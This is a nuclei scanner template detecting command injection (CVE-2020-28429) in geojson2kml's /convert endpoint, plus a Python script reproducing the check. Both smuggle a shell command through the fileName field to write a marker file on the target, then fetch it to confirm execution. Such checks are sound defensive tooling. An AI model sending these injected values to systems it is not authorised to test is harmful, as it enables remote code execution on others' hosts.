id: CVE-2020-28429

info:
  name: geojson2kml - Command Injection
  author: eeche,chae1xx1os,persona-twotwo,soonghee2
  severity: critical
  description: |
    Detects OS command injection in geojson2kml's /convert endpoint. A shell command is injected through the `fileName` field to write a random marker into `{{filename}}.txt`; the check then fetches that file from /file/ and succeeds only if it is served with the marker inside, which proves the injected command ran on the target.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, or privilege escalation on the host running geojson2kml.
  remediation: |
    There is no fixed version of geojson2kml; do not use it.
  reference:
    - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
    - https://github.com/advisories/GHSA-w83x-fp72-p9qc
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28429
    cwe-id: CWE-78
    epss-score: 0.63305
    epss-percentile: 0.99098
    cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geojson2kml_project
    product: geojson2kml
    framework: node.js
  tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive,vuln

variables:
  filename: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
          "geoJsonData": {
            "type": "FeatureCollection",
            "features": [
              {
                "type": "Feature",
                "geometry": { "type": "Point", "coordinates": [102.0, 0.5] },
                "properties": { "prop0": "value0" }
              }
            ]
          }
        }

      - |
        GET /file/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c65912eedc79f93a5d1788b5baca899a284175567732132feacab166afcca85c022100b487b45093ef7bb7fe08d7390feb42d36db0208b686a32442a0d2da1f2b25c7d:922c64590222798bb761d5b6d8e72950
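The same two-step check as a stand-alone Python script, added here as an example; it is neither part of the nuclei template nor code from the geojson2kml project. It assumes only what the template assumes: the target exposes `POST /convert` and `GET /file/<name>.txt`, and a file written by the injected command is served back with a `text/html` content type. `rand_base`, `injected_filename`, `convert_body` and `is_vulnerable` are names chosen for this example; the matcher logic mirrors the template's `matchers-condition: and` block so it can be unit-tested without a target.

```python
"""Re-implementation of the CVE-2020-28429 nuclei check (added example, not the
template's or geojson2kml's own code). Assumes the target serves POST /convert
and GET /file/<name>.txt exactly as the template above does."""
import json
import secrets
import string
import sys
import urllib.error
import urllib.request

# Minimal valid FeatureCollection, same shape as the template's request body.
GEOJSON = {
    "type": "FeatureCollection",
    "features": [{
        "type": "Feature",
        "geometry": {"type": "Point", "coordinates": [102.0, 0.5]},
        "properties": {"prop0": "value0"},
    }],
}


def rand_base(n: int) -> str:
    """Equivalent of nuclei's {{rand_base(n)}}: n random lowercase letters/digits."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def injected_filename(marker: str, filename: str) -> str:
    """The fileName value the template sends: '&' terminates whatever command
    the server builds around the name, echo writes the marker to <filename>.txt."""
    return f'& echo "{marker}" > {filename}.txt && ls'


def convert_body(marker: str, filename: str) -> bytes:
    """JSON body for the first request; json.dumps escapes the inner quotes
    exactly as the template's raw request does (\\")."""
    return json.dumps({"fileName": injected_filename(marker, filename),
                       "geoJsonData": GEOJSON}).encode()


def is_vulnerable(status: int, headers: dict, body: str, marker: str) -> bool:
    """matchers-condition: and -> marker in body_2, text/html in header_2, status 200."""
    content_type = headers.get("Content-Type") or headers.get("content-type") or ""
    return status == 200 and "text/html" in content_type and marker in body


def check(base_url: str, timeout: float = 10.0) -> bool:
    """Send both requests to base_url (e.g. http://127.0.0.1:3000) and evaluate
    the second response with the template's matchers. Intrusive: writes a file."""
    marker, filename = secrets.token_hex(8), rand_base(6)
    req = urllib.request.Request(
        f"{base_url}/convert",
        data=convert_body(marker, filename),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        urllib.request.urlopen(req, timeout=timeout).read()
    except urllib.error.HTTPError:
        pass  # the conversion may fail after the injected command has already run
    try:
        with urllib.request.urlopen(f"{base_url}/file/{filename}.txt", timeout=timeout) as resp:
            body = resp.read().decode(errors="replace")
            return is_vulnerable(resp.status, dict(resp.headers), body, marker)
    except urllib.error.HTTPError:
        return False  # file never created: command did not execute


if __name__ == "__main__":
    target = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "http://127.0.0.1:3000"
    print("vulnerable" if check(target) else "not vulnerable")
```

Run it against a lab instance only: like the template it is tagged `intrusive`, since a positive result means a file was written on the target. The three `is_vulnerable` conditions are all required on purpose: a 200 with the marker but a different content type, or a 404 from the `/file/` route, both count as "not vulnerable", matching the template's `and` semantics.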